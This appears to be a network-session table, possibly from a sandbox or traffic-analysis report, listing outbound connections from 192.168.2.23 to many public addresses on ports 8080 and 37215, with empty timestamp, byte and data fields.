                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10266192.168.2.2351210152.127.137.2168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10267192.168.2.235261882.97.171.198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10268192.168.2.2344142160.119.178.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10269192.168.2.234855283.157.12.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10270192.168.2.2340894220.176.97.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10271192.168.2.2352686168.80.40.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10272192.168.2.235600891.115.135.508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10273192.168.2.2338878138.63.4.928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10274192.168.2.234919832.214.57.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10275192.168.2.2339630173.117.105.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10276192.168.2.233572638.122.77.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10277192.168.2.2343348212.183.38.1318080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10278192.168.2.2340190135.109.87.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10279192.168.2.23343729.189.104.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10280192.168.2.2353040140.40.63.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10281192.168.2.23606845.94.186.908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10282192.168.2.235977696.135.165.1728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10283192.168.2.233572642.219.249.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10284192.168.2.2357360137.9.221.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10285192.168.2.235670469.75.190.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10286192.168.2.234824261.43.194.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10287192.168.2.234934067.17.126.1508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10288192.168.2.234389285.227.183.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10289192.168.2.2335078200.67.31.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10290192.168.2.23414722.80.84.888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10291192.168.2.2355720210.132.235.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10292192.168.2.2334672118.77.83.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10293192.168.2.2336422217.113.160.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10294192.168.2.2339152176.101.43.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10295192.168.2.2354828109.216.64.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10296192.168.2.2344496148.171.218.2538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10297192.168.2.2338026162.23.143.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10298192.168.2.2354112164.238.20.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10299192.168.2.2353830117.139.26.1238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10300192.168.2.2349162162.41.73.1088080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10301192.168.2.2344986121.115.242.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10302192.168.2.235970065.82.8.698080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10303192.168.2.235437814.203.18.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10304192.168.2.233591031.145.70.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10305192.168.2.2335932184.45.200.78080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10306192.168.2.234684864.157.41.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10307192.168.2.2345046192.44.128.1118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10308192.168.2.2335854158.213.109.678080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10309192.168.2.2357390160.132.141.868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10310192.168.2.234197881.152.241.1998080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10311192.168.2.235150277.95.109.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10312192.168.2.2358104153.37.200.2468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10313192.168.2.234120463.124.87.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10314192.168.2.2333650143.76.31.768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10315192.168.2.234990438.249.57.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10316192.168.2.2357416109.110.216.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10317192.168.2.2347268139.168.23.828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10318192.168.2.2357400105.202.21.1408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10319192.168.2.2351394198.50.147.488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10320192.168.2.2336382145.48.62.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10321192.168.2.233753848.63.218.188080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10322192.168.2.234016013.227.163.2528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10323192.168.2.2346834144.12.30.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10324192.168.2.234910289.71.9.1108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10325192.168.2.2347022107.203.80.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10326192.168.2.234250257.235.68.9737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10327192.168.2.2335184197.45.147.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10328192.168.2.2349970197.205.143.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10329192.168.2.235855841.212.182.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10330192.168.2.233341841.65.244.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10331192.168.2.2358926197.228.188.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10332192.168.2.233975441.166.96.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10333192.168.2.2356768157.34.112.24537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10334192.168.2.2354520157.189.18.15337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10335192.168.2.2352520157.151.189.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10336192.168.2.2345582197.89.53.16737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10337192.168.2.2356626197.61.241.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10338192.168.2.234601641.106.175.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10339192.168.2.2335018197.108.206.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10340192.168.2.2344466175.181.184.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10341192.168.2.233536465.221.53.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10342192.168.2.234160246.174.49.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10343192.168.2.2340014157.25.136.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10344192.168.2.2335660147.117.44.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10345192.168.2.234164641.130.120.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10346192.168.2.2337450197.158.155.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10347192.168.2.234827441.39.207.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10348192.168.2.233928858.213.155.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10349192.168.2.2334104157.7.113.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10350192.168.2.235871475.220.95.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10351192.168.2.2335556157.255.228.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10352192.168.2.2334432157.84.178.20537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10353192.168.2.233621841.159.59.8737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10354192.168.2.234833041.75.5.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10355192.168.2.234734241.166.113.12237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10356192.168.2.2340076157.254.254.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10357192.168.2.2337414197.80.168.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10358192.168.2.2345394157.197.224.3337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10359192.168.2.236013434.162.149.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10360192.168.2.2349594157.186.207.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10361192.168.2.233842241.223.142.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10362192.168.2.2334844182.251.175.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10363192.168.2.234027841.82.9.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10364192.168.2.2332930157.236.140.8837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10365192.168.2.2336958193.111.38.7337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10366192.168.2.2358226197.111.159.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10367192.168.2.234622241.102.204.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10368192.168.2.2346566197.179.96.15937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10369192.168.2.234990241.86.231.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10370192.168.2.2352356197.52.143.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10371192.168.2.235507241.141.157.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10372192.168.2.2340964157.54.104.18437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10373192.168.2.233946041.163.200.15537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10374192.168.2.234531041.76.62.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10375192.168.2.2350968172.175.66.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10376192.168.2.2347742157.246.214.6437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10377192.168.2.2349136197.28.85.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10378192.168.2.2350474197.156.41.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10379192.168.2.235121241.248.36.3537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10380192.168.2.2338356157.149.21.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10381192.168.2.235100041.150.91.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10382192.168.2.2332782197.92.211.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10383192.168.2.235761841.246.68.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10384192.168.2.2358724189.119.103.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10385192.168.2.2358786197.69.68.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10386192.168.2.2339330157.131.84.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10387192.168.2.233566641.71.30.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10388192.168.2.2346010155.22.7.21737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10389192.168.2.234782441.12.242.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10390192.168.2.233827841.248.176.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10391192.168.2.2348980217.18.89.15637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10392192.168.2.234367641.247.10.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10393192.168.2.236009846.106.133.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10394192.168.2.234391274.207.89.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10395192.168.2.2344152197.134.74.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10396192.168.2.234044241.209.53.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10397192.168.2.233936041.205.96.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10398192.168.2.235445813.122.248.15137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10399192.168.2.2346938157.218.120.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10400192.168.2.2339802197.76.175.3037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10401192.168.2.2348306201.253.221.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10402192.168.2.236029641.132.126.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10403192.168.2.234836041.34.69.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10404192.168.2.2336580218.205.231.14537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10405192.168.2.2358664157.46.76.25137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10406192.168.2.235129041.129.28.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10407192.168.2.2346538197.175.30.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10408192.168.2.2360544157.98.32.1837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10409192.168.2.2338094197.252.58.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10410192.168.2.234818077.49.208.11137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10411192.168.2.2349222197.246.71.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10412192.168.2.2342806157.177.200.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10413192.168.2.2359594157.29.106.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10414192.168.2.2347246197.125.70.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10415192.168.2.2353302157.208.250.7837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10416192.168.2.2337156157.23.161.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10417192.168.2.234042641.209.45.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10418192.168.2.2334052160.67.154.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10419192.168.2.2350698197.73.106.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10420192.168.2.2337744157.218.187.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10421192.168.2.2336204157.10.16.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10422192.168.2.234490841.157.163.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10423192.168.2.2347578197.17.152.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10424192.168.2.2343436157.241.84.1637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10425192.168.2.234804841.213.217.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10426192.168.2.2337744197.192.145.12837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10427192.168.2.2338654131.196.107.16637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10428192.168.2.233405441.10.91.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10429192.168.2.2355924157.178.96.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10430192.168.2.2354104197.186.4.2637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10431192.168.2.2357194197.241.66.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10432192.168.2.2339684197.123.163.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10433192.168.2.233522241.118.212.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10434192.168.2.2343108197.169.182.17937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10435192.168.2.2336942197.216.213.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10436192.168.2.234863227.150.29.10537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10437192.168.2.234068041.84.219.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10438192.168.2.235264241.231.69.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10439192.168.2.233634444.230.195.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10440192.168.2.2359176157.6.53.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10441192.168.2.235560652.255.186.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10442192.168.2.234309841.194.197.9937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10443192.168.2.2335142157.120.38.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10444192.168.2.233601241.235.87.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10445192.168.2.2357906143.182.53.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10446192.168.2.2343580157.122.17.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10447192.168.2.234347041.119.38.4837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10448192.168.2.2347422197.173.32.9037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10449192.168.2.2333880157.140.147.24737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10450192.168.2.2346036197.0.250.10237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10451192.168.2.2353746204.154.125.13737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10452192.168.2.2337110197.103.19.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10453192.168.2.235418454.175.212.23937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10454192.168.2.233729841.44.0.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10455192.168.2.2334512197.101.140.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10456192.168.2.233626635.170.196.22037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10457192.168.2.2337424157.169.154.21337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10458192.168.2.2340058157.121.242.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10459192.168.2.2341938157.122.56.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10460192.168.2.234921058.39.118.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10461192.168.2.235968241.186.92.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10462192.168.2.233930641.254.79.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10463192.168.2.233354688.236.30.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10464192.168.2.235903441.80.231.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10465192.168.2.2334642107.84.194.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10466192.168.2.2342534157.142.189.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10467192.168.2.2356312197.21.66.20137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10468192.168.2.2345738157.130.198.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10469192.168.2.234081041.101.0.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10470192.168.2.2342632157.102.113.15837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10471192.168.2.2356104197.188.88.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10472192.168.2.233601441.186.234.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10473192.168.2.234546841.11.193.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10474192.168.2.235644241.155.35.24037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        10475192.168.2.2356514204.154.128.1837215
